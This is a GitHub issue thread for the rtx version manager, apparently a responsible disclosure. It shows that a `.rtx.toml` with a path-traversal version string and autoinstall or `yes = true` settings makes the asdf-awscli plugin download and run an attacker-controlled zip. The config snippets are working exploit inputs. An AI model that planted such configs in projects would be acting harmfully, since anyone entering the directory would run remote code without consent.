### ISSUE TITLE
Make missing_runtime_behavior a global only settings

### ISSUE THREAD

**Issue by Riatre** [jdx/rtx#735]
Unfortunately, I have realized that requiring `[plugins]` to be trusted as in #728 is likely not enough. Since rtx by default comes with a large set of asdf community plugin definitions, any bug in these plugins can be used to do the same as what's shown in #728. For example, I just randomly picked something I heard of from the first few entries of `rtx p ls-remote` and found a bug:

```
[tools]
awscli = ["1/../../riatre-test-s3-bucket/quite-strange"]

[settings]
missing_runtime_behavior = "autoinstall"
```

Upon on entering the directory with such a `.rtx.toml`, MetricMike/asdf-awscli [downloads](https://github.com/MetricMike/asdf-awscli/blob/2e313965ea2f4654948b816add3dce4233b79385/bin/download#L41) `https://s3.amazonaws.com/aws-cli/awscli-bundle-1/../../riatre-test-s3-bucket/quite-strange.zip` with curl and due to how curl and S3 path style works it normalizes the URI and downloads `https://s3.amazonaws.com/riatre-test-s3-bucket/quite-strange.zip` which is a bucket I control. It then extracts and [executes](https://github.com/MetricMike/asdf-awscli/blob/2e313965ea2f4654948b816add3dce4233b79385/bin/install#L86) `awscli-bundle/install` in the zip file, which does `id > /tmp/uh-oh`

<details><summary>(Note that the example zip file does not contains bin/aws, hence it prints the following error, but you can see that /tmp/uh-oh was created)</summary>

```
asdf-awscli: Expected /home/riatre/.local/share/rtx/installs/awscli/1/../../riatre-test-s3-bucket/quite-st
range/bin/aws to be executable.
asdf-awscli: An error ocurred while installing awscli 1/../../riatre-test-s3-bucket/quite-strange.
rtx awscli@1/../../riatre-test-s3-bucket/quite-strange [ERROR] /home/riatr ✗ 1s rtx ~/.local/share/rtx/plu
gins/awscli/bin/install exited with non-zero status: exit code 1
```
</details>

I can get the bug in asdf-awscli fixed, and to be clear, I think it is fair to call asdf-awscli (and trigger its bug) if I run `rtx install` in the directory with such a `.rtx.toml`, but it doesn't feel right to let a `.rtx.toml` override the `missing_runtime_behavior` to make it completely automatic. In the case of extracting a tarball I don't even have the chance to inspect a `.rtx.toml` before it is executed.

**Comment by jdx** [comment]
thanks for doing some of the work around analyzing this behavior, it's important. And I apologize for the delay here.

Notably (though I'm not sure when I did this), I unofficially "deprecated" missing_runtime_behavior and removed all mentions of it from the docs. This was mostly a UX change since I found that using the `--yes` CLI flag was a cleaner way of doing this that more directly did what the user wanted. Long-term, I would like to remove missing_runtime_behavior from the codebase since it definitely makes things more complex than needed.

That said, your question is still valid since you can also just do this:

```
[tools]
awscli = ["1/../../riatre-test-s3-bucket/quite-strange"]

[settings]
yes = true
```

Maybe that setting should just be removed actually.
